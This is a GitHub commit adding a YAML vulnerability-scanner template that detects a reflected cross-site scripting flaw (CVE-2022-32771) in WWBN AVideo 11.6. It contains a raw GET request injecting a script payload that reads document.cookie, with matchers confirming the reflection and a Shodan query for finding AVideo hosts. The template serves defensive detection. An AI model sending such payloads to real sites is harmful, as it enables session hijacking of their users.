Create CVE-2022-32771.yaml

patch-1
Arafat Ansari 2022-08-28 13:20:20 +05:30 committed by GitHub
parent 64cd13bd72
commit aace6607f7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: CVE-2022-32771
info:
name: WWBN AVideo 11.6 - Reflected Cross Site Scripting
author: arafatansari
severity: medium
description: |
A cross-site scripting (xss) vulnerability exists in the footer alerts functionality of WWBN AVideo 11.6 via "success" parameter which is inserted into the document with insufficient sanitization.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32771
- https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538
metadata:
shodan-query: http.html:"AVideo"
verified: "true"
tags: xss,cve,2022, avideo,wwbn
requests:
- raw:
- |
GET /index.php?success=</script><script>alert(document.cookie);</script> HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<script>alert(document.cookie);</script>'